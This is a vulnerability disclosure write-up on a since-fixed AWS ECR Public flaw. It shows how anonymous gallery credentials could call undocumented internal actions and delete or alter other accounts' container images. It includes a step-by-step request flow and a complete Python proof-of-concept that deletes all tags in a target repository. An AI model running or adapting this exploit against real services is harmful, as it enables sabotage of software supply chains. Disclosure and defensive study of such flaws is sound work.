AWS ECR Public Vulnerability

Gafnit Amiga
Tuesday, Dec 13th, 2022

Executive Summary

I discovered a critical AWS Elastic Container Registry Public (ECR Public) vulnerability that allowed external actors to delete, update, and create ECR Public images, layers, and tags in registries and repositories that belong to other AWS Accounts, by abusing undocumented internal ECR Public API actions. Prior to mitigation, this vulnerability could have potentially led to denial of service, data exfiltration, lateral movement, privilege escalation, data destruction, and other multi-variate attack paths that are only limited by the craftiness and goals of the adversary.

By exploiting this vulnerability, a malicious actor could delete all images in the Amazon ECR Public Gallery or update the image contents to inject malicious code. This malicious code would be executed on any machine that pulls and runs the image, whether on users’ local machines, Kubernetes clusters, or cloud environments. Using this vulnerability, an attacker could infect popular images such as CloudWatch agent, Datadog agent, EKS Distro, Amazon Linux, and Nginx, all while abusing the trust model of ECR Public, as these images would masquerade as being verified and thus undermine the ECR Public supply chain. The top six most popular (by downloads) images on the ECR Public Gallery combine for around 13 billion downloads, and there are several thousand more images stored on ECR Public.

This vulnerability was reported to the AWS Security Outreach Team, who immediately responded and worked with the ECR Public team to fix the vulnerability in less than twenty-four hours. AWS has conducted an analysis of the logs and confirmed that the only activity they identified related to the issue was between my research accounts. No customer action is required to remediate the issue.

AWS Security Bulletin: https://aws.amazon.com/security/security-bulletins/AWS-2022-010/ 

Timeline

  • Nov 15, 2022: The vulnerability was reported to AWS Security. AWS Security Outreach and ECR Public teams validated the vulnerability and started to deploy the fix.
  • Nov 16, 2022: The fix was successfully deployed.
  • Dec 13, 2022: Coordinated disclosure with AWS.

The Amazon ECR Public Gallery is a public portal that lists all public repositories hosted on the Amazon ECR Public service. Popular companies, projects, and services, such as NGINX, Ubuntu, Amazon Linux, and HashiCorp Consul, publish their images in the gallery for public consumption and usage.

Each AWS account is provided with a default Amazon ECR Public Registry that comes with a unique default alias. AWS allows customers to set a custom alias for their Registry to create a meaningful public registry name. For example, in my account, the Amazon ECR Public registry default alias is w8r5q5v0 and I assigned a custom alias of gafresearch as shown in the screenshot below.

Any ECR Public Repository created in the AWS Account is assigned to the Account’s default Amazon ECR Public Registry. Whenever a new ECR Public Repository is created, it is automatically mirrored on the Amazon ECR Public Gallery web application with all its details. I decided to create a new public repository, “gafpubrep”, with a simple Docker Image to better understand how exactly it is presented in the Amazon ECR Public Gallery. My repository URI is public.ecr.aws/w8r5q5v0/gafpubrep, and I have pushed an image with a “latest” tag to it as shown in the screenshot below.

The repository can also be found in the Amazon ECR Public Gallery at https://gallery.ecr.aws/w8r5q5v0/gafpubrep as shown in the screenshot below.

When accessing the Repository “gafpubrep” in the Amazon ECR Public Gallery, the following HTTP POST request is sent in the background as shown in the screenshot below.

Note that the value of the X-Amz-Target HTTP header is SpencerFrontendService.DescribeImageTagsInternal. ECR Public has the DescribeImageTags API action available, but the Internal suffix is odd since the endpoint itself is not internal. Also, the SpencerFrontendService service is unfamiliar and doesn’t have Google results or public mentions, likely denoting an internal AWS service or an old codename for the ECR Public Service. Additionally, SpencerFrontendService is referenced again in the X-Amz-Target HTTP header for requests coming out of the Amazon ECR console. The request is also authenticated using AWS SigV4 and temporary credentials, which are probably not my AWS Console credentials, as the Amazon ECR Public Gallery application does not request login.
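To make the observation about SigV4 and temporary credentials concrete, here is a minimal sketch of how such a captured request could be inspected. The header values are hypothetical placeholders, not the ones from my capture, and the helper names are my own. The sketch relies on two general AWS conventions: temporary credentials are accompanied by an X-Amz-Security-Token header, and their access key IDs start with ASIA.

```python
# Hypothetical header values shaped like the observed request; the key ID,
# session token, date, and signature are made-up placeholders.
SAMPLE_HEADERS = {
    "X-Amz-Target": "SpencerFrontendService.DescribeImageTagsInternal",
    "X-Amz-Security-Token": "EXAMPLE-SESSION-TOKEN",
    "Authorization": (
        "AWS4-HMAC-SHA256 "
        "Credential=ASIAEXAMPLEKEYID0000/20221115/us-east-1/ecr-public/aws4_request, "
        "SignedHeaders=content-type;host;x-amz-date;x-amz-target, "
        "Signature=0123abcd"
    ),
}


def parse_sigv4_authorization(value):
    """Split a SigV4 Authorization header into its named components."""
    algorithm, _, rest = value.partition(" ")
    # The remainder is a comma-separated list of Name=Value pairs.
    fields = dict(part.strip().split("=", 1) for part in rest.split(","))
    key_id, date, region, service, _terminator = fields["Credential"].split("/")
    return {
        "algorithm": algorithm,
        "access_key_id": key_id,
        "date": date,
        "region": region,
        "service": service,
        "signed_headers": fields["SignedHeaders"].split(";"),
    }


def uses_temporary_credentials(headers):
    """Temporary credentials carry a session token and an ASIA-prefixed key ID."""
    parsed = parse_sigv4_authorization(headers["Authorization"])
    return (
        "X-Amz-Security-Token" in headers
        and parsed["access_key_id"].startswith("ASIA")
    )


parsed = parse_sigv4_authorization(SAMPLE_HEADERS["Authorization"])
print(parsed["service"], parsed["region"], uses_temporary_credentials(SAMPLE_HEADERS))
```

The access key ID extracted this way is also a convenient search term for finding the earlier response that issued the credentials.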

I searched for more Internal actions in the Amazon ECR Public Gallery main JavaScript file and found 12 actions with the Internal suffix. For each action, I searched for a matching API action both in the ECR and ECR Public API documentation. The table below shows the results of this mapping.

Action Name                                 | Matching ECR Public API Action | Matching ECR API Action
GetRegistryCatalogDataInternal              | GetRegistryCatalogData         | -
GetRepositoryCatalogDataInternal            | GetRepositoryCatalogData       | -
DescribeImageTagsInternal                   | DescribeImageTags              | -
BatchGetImageInternal                       | -                              | BatchGetImage
GetDownloadUrlForLayerInternal              | -                              | GetDownloadUrlForLayer
SearchRepositoryCatalogDataInternal         | -                              | -
DescribeRepositoryCatalogDataInternal       | -                              | -
DeleteImageForConvergentReplicationInternal | -                              | -
DeleteTagForConvergentReplicationInternal   | -                              | -
PutImageForConvergentReplicationInternal    | -                              | -
PutLayerForConvergentReplicationInternal    | -                              | -
PutRegistryAliasInternal                    | -                              | -
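The search for Internal actions described above can be sketched in a few lines of Python. This is only an illustration of the idea: the sample bundle text is a made-up fragment, not the real gallery JavaScript, and the function names are hypothetical.

```python
import re

# Identifiers that start with an uppercase letter and end with "Internal".
ACTION_PATTERN = re.compile(r"\b([A-Z][A-Za-z]+Internal)\b")


def find_internal_actions(js_source):
    """Return the unique action names with the Internal suffix, sorted."""
    return sorted(set(ACTION_PATTERN.findall(js_source)))


def public_counterpart(action):
    """Strip the Internal suffix to get the name to look up in the API docs."""
    return action[: -len("Internal")]


# Made-up stand-in for a fragment of a minified JavaScript bundle.
sample_bundle = (
    'ops={DescribeImageTagsInternal:{input:{}},PutRegistryAliasInternal:{}};'
    't="SpencerFrontendService.DescribeImageTagsInternal";'
)

for action in find_internal_actions(sample_bundle):
    print(action, "->", public_counterpart(action))
```

Each stripped name can then be checked by hand against the ECR and ECR Public API references, which is how the table above was filled in.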

Since Amazon ECR Public Gallery presents only public repository details, I would expect to see only ECR Public API actions, but that was not the case. The Internal actions include 3 ECR Public actions, 2 ECR actions and 7 additional publicly undocumented actions. To better understand these actions, I mapped their triggers: I captured which operations in the Amazon ECR Public Gallery UI, the Amazon ECR console, or Docker CLI commands cause them. The table below shows the results of this experiment.

Action name | Triggers
GetRegistryCatalogDataInternal | When accessing a specific public repository page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/gafpubrep; when accessing a specific public registry page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/
GetRepositoryCatalogDataInternal | When accessing a specific public repository page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/gafpubrep
DescribeImageTagsInternal | When accessing a specific public repository page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/gafpubrep
BatchGetImageInternal | Docker client pull image command; Docker client inspect manifest command
GetDownloadUrlForLayerInternal | Docker client pull command
SearchRepositoryCatalogDataInternal | When accessing the main gallery page at https://gallery.ecr.aws/; when using the search option
DescribeRepositoryCatalogDataInternal | When accessing a specific public registry page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/
DeleteImageForConvergentReplicationInternal | (no trigger found)
DeleteTagForConvergentReplicationInternal | (no trigger found)
PutImageForConvergentReplicationInternal | (no trigger found)
PutLayerForConvergentReplicationInternal | (no trigger found)
PutRegistryAliasInternal | When setting a custom alias for the Amazon ECR Public registry in the AWS ECR console (requires login)

From the table above, ECR Public API actions are triggered from the Amazon ECR Public Gallery application to get the public repositories’ details. The two ECR API actions, BatchGetImageInternal and GetDownloadUrlForLayerInternal, are triggered by the Docker client to support the public pull operation. The undocumented API action PutRegistryAliasInternal is triggered when a custom registry alias is set in the AWS ECR console. I was then left with four undocumented Internal API actions whose triggers I couldn’t find: DeleteImageForConvergentReplicationInternal, DeleteTagForConvergentReplicationInternal, PutImageForConvergentReplicationInternal and PutLayerForConvergentReplicationInternal.

The diagram below summarizes all the observed interactions with the ECR Public internal API.

The diagram includes all 3 optional triggers for the Internal ECR Public API: Docker client, AWS ECR console, and Amazon ECR Public Gallery UI. The same observed flow with the Docker client can trigger the BatchGetImageInternal action using the docker manifest inspect command.

Activating the Undocumented Internal Actions

I wanted to manually invoke Internal actions for two main reasons:

  1. To manipulate the request, test it, and tamper with its parameters.
  2. To invoke the four undocumented actions for which I didn’t find their triggers.

Regarding the four undocumented actions, those actions are the most interesting because they are not “read only” and would (potentially) allow me to Put or Delete images from ECR Public Registries and their associated Repositories, which I do not own.

I started with the DescribeImageTagsInternal action because I already knew its request structure. I first tried to send the request without any authentication and received a “Missing Authentication Token” error. Then, I tried to use my own AWS credentials to sign the request and received an “Access Denied” error instead, as shown in the screenshot below.

I realized that I must intercept and use the specific identity credentials which are also used by the Amazon ECR Public Gallery as part of the original SigV4 flow observed earlier.

Back to the credentials from the SigV4 signed request, let’s try to find who they belong to and what they can do. During the research on the Internal API actions, I recognized that all requests from the Amazon ECR Public Gallery application are authenticated. The X-Amz-Security-Token header implies that those are temporary credentials of some AWS IAM Role. I searched for the AccessKeyId value to locate the originating request that accepted those temporary credentials. The request I observed is shown in the screenshot below.

This is a request to the Amazon Cognito GetCredentialsForIdentity API action to obtain temporary, limited-privilege credentials to access other AWS services. Cognito is an AWS service that provides authentication, authorization, and user management for web and mobile applications and for specific AWS services. Note that the GetCredentialsForIdentity action is a public API, and no credentials are needed to call it. The Amazon Cognito documentation on the identity pools authentication flow covers the specifics.
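To illustrate why no credentials are needed, here is a minimal sketch that builds (but does not send) a raw GetCredentialsForIdentity request using only the standard library. The identity ID is a hypothetical placeholder and the function name is my own; the endpoint, content type, and X-Amz-Target value follow the usual Cognito Identity JSON protocol conventions. Note the absence of an Authorization header.

```python
import json
import urllib.request

# Regional Cognito Identity endpoint; us-east-1 is assumed here.
COGNITO_ENDPOINT = "https://cognito-identity.us-east-1.amazonaws.com/"

# Hypothetical identity ID, in the "<region>:<uuid>" form Cognito uses.
EXAMPLE_IDENTITY_ID = "us-east-1:00000000-0000-4000-8000-000000000000"


def build_get_credentials_request(identity_id):
    """Build an unsigned GetCredentialsForIdentity request (not sent here)."""
    body = json.dumps({"IdentityId": identity_id}).encode("utf-8")
    return urllib.request.Request(
        COGNITO_ENDPOINT,
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/x-amz-json-1.1",
            "X-Amz-Target": "AWSCognitoIdentityService.GetCredentialsForIdentity",
        },
    )


request = build_get_credentials_request(EXAMPLE_IDENTITY_ID)
# No SigV4 signature is attached: the call is made anonymously.
print(request.get_method(), request.full_url, request.has_header("Authorization"))
```

Passing the request to urllib.request.urlopen would perform the call; for an unauthenticated identity the JSON response carries a Credentials object with AccessKeyId, SecretKey, and SessionToken fields.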

I can use those temporary credentials to sign requests to other AWS services’ APIs, including Cognito and ECR Public. I then attempted to use the identity’s temporary credentials to access another Amazon Cognito API, DescribeIdentity as demonstrated in the screenshot below.

From the error above you can see that the temporary credentials belong to the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole-103M4HZ3UDLSZ AWS IAM role, located in an internal AWS Account with the identifier of 421354852932, likely used to host a part of the ECR Public internal services.
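Access-denied errors of this kind typically name the calling principal as an assumed-role ARN, which is what makes the role and account visible. The sketch below shows how the two can be pulled out of such a message. The exact message wording and the session name in the sample are assumptions for illustration; only the role name and account ID come from the error I received.

```python
import re

# Assumed-role ARN: arn:aws:sts::<account>:assumed-role/<role>/<session>
ASSUMED_ROLE_ARN = re.compile(
    r"arn:aws:sts::(?P<account_id>\d{12}):assumed-role/"
    r"(?P<role_name>[\w+=,.@-]+)/(?P<session_name>[\w+=,.@-]+)"
)

# Illustrative message; the wording and session name are assumptions.
SAMPLE_ERROR = (
    "User: arn:aws:sts::421354852932:assumed-role/"
    "SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole-103M4HZ3UDLSZ/"
    "CognitoIdentityCredentials is not authorized to perform: "
    "cognito-identity:DescribeIdentity"
)


def principal_from_error(message):
    """Return the account ID, role name, and session name, or None."""
    match = ASSUMED_ROLE_ARN.search(message)
    return match.groupdict() if match else None


principal = principal_from_error(SAMPLE_ERROR)
print(principal["account_id"], principal["role_name"])
```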

Below is a diagram that theoretically demonstrates how I believe the Amazon ECR Public Gallery UI obtains temporary credentials for the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole role to authenticate and authorize requests to ECR Public internal APIs.

Now that I know how to authenticate against the ECR Public internal API using the SpencerPortalCognitoInfra identity, I can invoke the DescribeImageTagsInternal action from before. The screenshot below demonstrates the successful API request.

Now that I have successfully invoked one of the Internal actions, I can use a similar technique to invoke the others, focusing on those which would allow me to Put or Delete images from ECR Public Registries and their associated Repositories, which I do not own.

Exploit Proof of Concept: Deleting Image Tags

In this Proof of Concept (POC) I will focus on the DeleteTagForConvergentReplicationInternal API action, but this POC’s approach can be executed against the DeleteImageForConvergentReplicationInternal, PutImageForConvergentReplicationInternal, PutLayerForConvergentReplicationInternal and all other API actions.

Since the DeleteTagForConvergentReplicationInternal action is undocumented, I need to discover the request structure. When I try to send the request with an empty body, I get an error specifying that the imageTagEntity parameter is required as shown in the screenshot below.

I went back to the Amazon ECR Public Gallery main JavaScript file and searched for the “DeleteTagForConvergentReplicationInternal” string. This led me to a JSON structure that describes the expected input and output of the action. The image below highlights this structure.

The input is indeed the “imageTagEntity” object that has a structure of shape “S2j”. The image below shows the structure of shape “S2j” which contains the entityId, repositoryEntityId, imageManifestEntityId, tag, createdAt, updatedAt, and deletedAt fields.

Note that all fields are atomic types and not structures. Each field is either a string (an empty type means string) or a timestamp; other structures also use int (integer) and long types. Finding the fields’ values required trial and error, along with combining values from other actions’ results. Finally, I had the full flow to obtain all required details. Let’s use my test public repository, https://gallery.ecr.aws/w8r5q5v0/gafpubrep, that has the sample image with the “latest” tag public.ecr.aws/w8r5q5v0/gafpubrep:latest as an example.

  • entityId – A random UUID V4.
  • tag – The tag name we would like to delete – in my example it’s “latest”.
  • repositoryEntityId and imageManifestEntityId – To get these values we need to use the GetDownloadUrlForLayerInternal action. This action returns a URL from where you can download the layer’s content. If we request the download URL of the manifest, the returned URL will include the UUIDs both of repositoryEntityId and imageManifestEntityId. But, to request the download URL of the manifest, we need to know its digest. We can get the manifest’s digest from BatchGetImageInternal response. But, BatchGetImageInternal requires the image digest, which we can get from DescribeImageTagsInternal response. Putting it all together, here is the flow.

1. Send request to DescribeImageTagsInternal – Use the target registry alias and repository name to set the values of registryAliasName and repositoryName parameters respectively as shown below.

2. Save the values of imageDigest and createdAt for next steps.
3. Send request to BatchGetImageInternal – Use the registry alias, repository name, image tag, and imageDigest from before to set the values of registryAliasName, repositoryName, imageTag, and imageDigest parameters respectively.

4. Save the manifest’s digest value from the response at images[0].imageManifest.config.digest (parse imageManifest as JSON).
5. Send request to GetDownloadUrlForLayerInternal – Use the registry alias, repository name, and the manifest’s digest from before to set the values of registryAliasName, repositoryName, and layerDigest parameters respectively.

6. Extract the UUIDs of repositoryEntityId and imageManifestEntityId from the downloadUrl in the response:
https://xxxx.cloudfront.net/xxxxxx-<account_id>-<repositoryEntityId>/<imageManifestEntityId>?...

  • createdAt, updatedAt and deletedAt – Use the createdAt value saved from the DescribeImageTagsInternal response.
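The field list above can be sketched as a small builder that takes the downloadUrl from step 6 and assembles the imageTagEntity body. This is a minimal illustration that uses urllib.parse rather than a regular expression; the sample URL, UUIDs, and timestamp are made-up values in the shape described above, and the function names are hypothetical.

```python
import uuid
from urllib.parse import urlparse


def entity_ids_from_download_url(download_url):
    """Return (repositoryEntityId, imageManifestEntityId) from a download URL."""
    segments = urlparse(download_url).path.strip("/").split("/")
    first_segment, manifest_entity_id = segments[0], segments[1]
    # A UUID string is 36 characters long; it is the tail of the first segment.
    repository_entity_id = first_segment[-36:]
    # uuid.UUID raises ValueError if either value is not a well-formed UUID.
    uuid.UUID(repository_entity_id)
    uuid.UUID(manifest_entity_id)
    return repository_entity_id, manifest_entity_id


def build_image_tag_entity(download_url, tag, created_at):
    """Assemble the request body using the field names of shape S2j."""
    repository_entity_id, manifest_entity_id = entity_ids_from_download_url(download_url)
    return {
        "imageTagEntity": {
            "entityId": str(uuid.uuid4()),  # random UUID v4
            "repositoryEntityId": repository_entity_id,
            "imageManifestEntityId": manifest_entity_id,
            "tag": tag,
            # All three timestamps reuse the tag's createdAt value.
            "createdAt": created_at,
            "updatedAt": created_at,
            "deletedAt": created_at,
        }
    }


# Made-up URL in the documented shape; none of these values are real.
SAMPLE_URL = (
    "https://d0000000000000.cloudfront.net/"
    "abc123-123456789012-11111111-2222-4333-8444-555555555555/"
    "aaaaaaaa-bbbb-4ccc-8ddd-eeeeeeeeeeee?Expires=0"
)

body = build_image_tag_entity(SAMPLE_URL, "latest", 1668500000.0)
print(sorted(body["imageTagEntity"]))
```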

Now that we have the full request body, we can send the request to the DeleteTagForConvergentReplicationInternal API action as shown below.

When we refresh the gafpubrep repository page https://gallery.ecr.aws/w8r5q5v0/gafpubrep in the Amazon ECR Public Gallery, we can see that all images were deleted as shown in the screenshot below.

Also, when I log in to my personal AWS ECR console, I can see that the tags were also removed there as shown in the screenshot below.

The Python script provided below executes all steps described above to activate the DeleteTagForConvergentReplicationInternal API action.

```python
import datetime
import hashlib
import hmac
import json
import re
import sys
import uuid

import boto3
import requests

# Set this value to the target registry alias
registry_alias_name = 'w8r5q5v0'
# Set this value to the target repository name
repository_name = 'gafpubrep'

DESCRIBE_REPOSITORY_CATALOG_DATA = 'SpencerFrontendService.DescribeRepositoryCatalogDataInternal'
DESCRIBE_IMAGE_TAGS = 'SpencerFrontendService.DescribeImageTagsInternal'
BATCH_GET_IMAGE = 'SpencerFrontendService.BatchGetImageInternal'
GET_DOWNLOAD_URL_FOR_LAYER = 'SpencerFrontendService.GetDownloadUrlForLayerInternal'
DELETE_TAG_FOR_CONVERGENT_REPLICATION = 'SpencerFrontendService.DeleteTagForConvergentReplicationInternal'

access_key_id = ''
secret_key = ''
session_token = ''


def init_spencer_creds():
    """
    Uses Amazon Cognito GetCredentialsForIdentity to get temporary credentials for
    the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole Role and stores them in
    the module-level globals.
    I'm using GetCredentialsForIdentity with an IdentityId I have already issued
    so as not to overflow the IdentityPool with a new GetId each time.
    """
    global access_key_id, secret_key, session_token
    # The identity pool lives in us-east-1 (see the IdentityId prefix).
    client = boto3.client('cognito-identity', region_name='us-east-1')
    response = client.get_credentials_for_identity(
        IdentityId='us-east-1:4efdd100-5f28-4444-9dc6-8b201cfef87a'
    )
    if not response.get("Credentials"):
        print("Error while getting temporary credentials.")
        sys.exit(1)
    access_key_id = response["Credentials"]["AccessKeyId"]
    secret_key = response["Credentials"]["SecretKey"]
    session_token = response["Credentials"]["SessionToken"]


def sign(key, msg):
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()


def getSignatureKey(key, date_stamp, regionName, serviceName):
    # Standard SigV4 signing-key derivation
    kDate = sign(('AWS4' + key).encode('utf-8'), date_stamp)
    kRegion = sign(kDate, regionName)
    kService = sign(kRegion, serviceName)
    kSigning = sign(kService, 'aws4_request')
    return kSigning


def send_request(request_parameters, amz_target):
    """Sign a JSON request body with SigV4 and POST it to the ECR Public endpoint."""
    method = 'POST'
    service = 'ecr-public'
    host = 'ecr-public.us-east-1.amazonaws.com'
    region = 'us-east-1'
    endpoint = 'https://ecr-public.us-east-1.amazonaws.com'
    content_type = 'application/x-amz-json-1.1'

    t = datetime.datetime.now(datetime.timezone.utc)
    amz_date = t.strftime('%Y%m%dT%H%M%SZ')
    date_stamp = t.strftime('%Y%m%d')

    canonical_uri = '/'
    canonical_querystring = ''
    canonical_headers = ('content-type:' + content_type + '\n' +
                         'host:' + host + '\n' +
                         'x-amz-date:' + amz_date + '\n' +
                         'x-amz-target:' + amz_target + '\n')
    signed_headers = 'content-type;host;x-amz-date;x-amz-target'
    payload_hash = hashlib.sha256(request_parameters.encode('utf-8')).hexdigest()

    # Create canonical request
    canonical_request = (method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' +
                         canonical_headers + '\n' + signed_headers + '\n' + payload_hash)

    # Create string to sign
    algorithm = 'AWS4-HMAC-SHA256'
    credential_scope = date_stamp + '/' + region + '/' + service + '/' + 'aws4_request'
    string_to_sign = (algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' +
                      hashlib.sha256(canonical_request.encode('utf-8')).hexdigest())

    signing_key = getSignatureKey(secret_key, date_stamp, region, service)
    signature = hmac.new(signing_key, string_to_sign.encode('utf-8'), hashlib.sha256).hexdigest()

    authorization_header = (algorithm + ' ' +
                            'Credential=' + access_key_id + '/' + credential_scope + ', ' +
                            'SignedHeaders=' + signed_headers + ', ' +
                            'Signature=' + signature)

    headers = {'Content-Type': content_type,
               'X-Amz-Date': amz_date,
               'X-Amz-Target': amz_target,
               'X-Amz-Security-Token': session_token,
               'Authorization': authorization_header}

    response = requests.post(endpoint, data=request_parameters, headers=headers)
    return response.json()


def describe_repository_catalog_data(registry_alias_name):
    request_parameters = json.dumps({"registryAliasName": registry_alias_name})
    return send_request(request_parameters, amz_target=DESCRIBE_REPOSITORY_CATALOG_DATA)


def describe_image_tags(registry_alias_name, repository_name):
    request_parameters = json.dumps({
        "registryAliasName": registry_alias_name,
        "repositoryName": repository_name,
    })
    return send_request(request_parameters, amz_target=DESCRIBE_IMAGE_TAGS)


def batch_get_image(registry_alias_name, repository_name, image_digest, image_tag):
    request_parameters = json.dumps({
        "registryAliasName": registry_alias_name,
        "repositoryName": repository_name,
        "imageIds": [{"imageDigest": image_digest, "imageTag": image_tag}],
    })
    return send_request(request_parameters, amz_target=BATCH_GET_IMAGE)


def get_download_url_for_layer(registry_alias_name, repository_name, layer_digest):
    request_parameters = json.dumps({
        "registryAliasName": registry_alias_name,
        "repositoryName": repository_name,
        "layerDigest": layer_digest,
    })
    return send_request(request_parameters, amz_target=GET_DOWNLOAD_URL_FOR_LAYER)


def delete_tag_for_convergent_replication(repository_entity_id, image_manifest_entity_id, tag,
                                          created_at, updated_at, deleted_at):
    request_parameters = json.dumps({
        "imageTagEntity": {
            "entityId": str(uuid.uuid4()),
            "repositoryEntityId": repository_entity_id,
            "imageManifestEntityId": image_manifest_entity_id,
            "tag": tag,
            "createdAt": created_at,
            "updatedAt": updated_at,
            "deletedAt": deleted_at,
        }
    })
    return send_request(request_parameters, amz_target=DELETE_TAG_FOR_CONVERGENT_REPLICATION)


def get_repositories(registry_alias_name):
    response = describe_repository_catalog_data(registry_alias_name)
    return [r["repositoryName"] for r in response["repositories"]]


def get_image_tags_details(registry_alias_name, repository_name):
    response = describe_image_tags(registry_alias_name, repository_name)
    return response["imageTagDetails"]


def delete_tag(registry_alias_name, repository_name, image_digest, image_tag, image_created_at):
    response = batch_get_image(registry_alias_name, repository_name, image_digest, image_tag)
    image_manifest = json.loads(response["images"][0]["imageManifest"])
    image_manifest_digest = image_manifest["config"]["digest"]

    response = get_download_url_for_layer(registry_alias_name, repository_name, image_manifest_digest)
    download_url = response["downloadUrl"]

    # The download URL embeds repositoryEntityId and imageManifestEntityId as UUIDs
    z = re.match(
        r'https:\/\/[^\/]+\/[0-9a-fA-F]{6}-\d+-([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})\/([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}).*',
        download_url)
    if z:
        repository_entity_id = z.group(1)
        image_manifest_entity_id = z.group(2)
        delete_tag_for_convergent_replication(repository_entity_id, image_manifest_entity_id, image_tag,
                                              created_at=image_created_at,
                                              updated_at=image_created_at,
                                              deleted_at=image_created_at)


init_spencer_creds()

# You can use SearchRepositoryCatalogDataInternal to get a list of all registries.
# You can loop over all repositories in the registry
# repositories_list = get_repositories(registry_alias_name)
image_tags_details_list = get_image_tags_details(registry_alias_name, repository_name)
for tag in image_tags_details_list:
    image_digest = tag["imageDetail"]["imageDigest"]
    image_tag = tag["imageTag"]
    image_created_at = tag["createdAt"]
    print(f"Deleting public.ecr.aws/{registry_alias_name}/{repository_name}:{image_tag}")
    delete_tag(registry_alias_name, repository_name, image_digest, image_tag, image_created_at)
print("Done.")
```

Conclusion

Supply chain attacks are hard to detect and difficult to prevent. The software supply chain is any person, process, or technology which interacts with the software development lifecycle: this can be individual developers, software packages, middleware, firmware, hardware, source code, Continuous Integration (CI) systems, and more. Given the wide breadth and depth of a software supply chain, this makes it exceptionally hard to cover all ground.

While SolarWinds was not the only technology targeted in 2019, supply chain attacks circumvent trust and can present themselves in multiple vectors, which is what makes them so potentially damaging. This ECR Public vulnerability is a classic example of a deep software supply chain attack. An adversary could do what I did and either remove or push new images which would appear as verified Registries belonging to Amazon, Canonical, and other popular companies and providers. It is difficult to guess exactly what would happen, but nearly any goal ranging from destruction and exfiltration to persistence and lateral movement can be executed from within a containerized environment.

To further put the potential impact of this vulnerability into perspective, just the top six most popular (by downloads) images on the ECR Public Gallery combine for around 13 billion downloads, and there are several thousand more images stored on ECR Public. An analysis of Panoptica customers shows that 26% of all Kubernetes clusters have at least one Pod that pulls an image from public.ecr.aws.

Software supply chain attacks are still difficult to pull off, but there are practices that security teams can implement to better protect their software supply chain. Whenever relying on a third party, always verify the digests and signatures of the artifacts. Continuously use static code analysis, container vulnerability management, and layer exploration tools to examine images for negative changes. Always use the minimum necessary number of dependencies and identity permissions for an image to avoid lateral movement.
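As a small illustration of the digest-verification advice, the sketch below compares the SHA-256 digest of downloaded bytes against a digest pinned ahead of time. The function names and sample content are hypothetical; in practice the pinned value would be recorded from a trusted source, and the bytes would be the manifest or layer actually downloaded.

```python
import hashlib
import hmac


def sha256_digest(data):
    """Return the digest in the 'sha256:<hex>' form used by container registries."""
    return "sha256:" + hashlib.sha256(data).hexdigest()


def matches_pinned_digest(data, pinned_digest):
    """True only if the content hashes to exactly the pinned digest."""
    return hmac.compare_digest(sha256_digest(data), pinned_digest)


# Hypothetical content standing in for a downloaded manifest.
original = b'{"schemaVersion": 2}'
pinned = sha256_digest(original)  # recorded once, from a trusted source

tampered = b'{"schemaVersion": 2, "injected": true}'
print(matches_pinned_digest(original, pinned), matches_pinned_digest(tampered, pinned))
```

Referencing an image by digest (public.ecr.aws/<alias>/<repository>@sha256:<digest>) rather than by a mutable tag applies the same idea at pull time: content that does not hash to the pinned value is rejected.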

Acknowledgements

I want to give a special thanks to Alexis Fahrney, Ryan Nolette, Dan Urson and the rest of the AWS Security Outreach team for their continued partnership, commitment and amazing work.
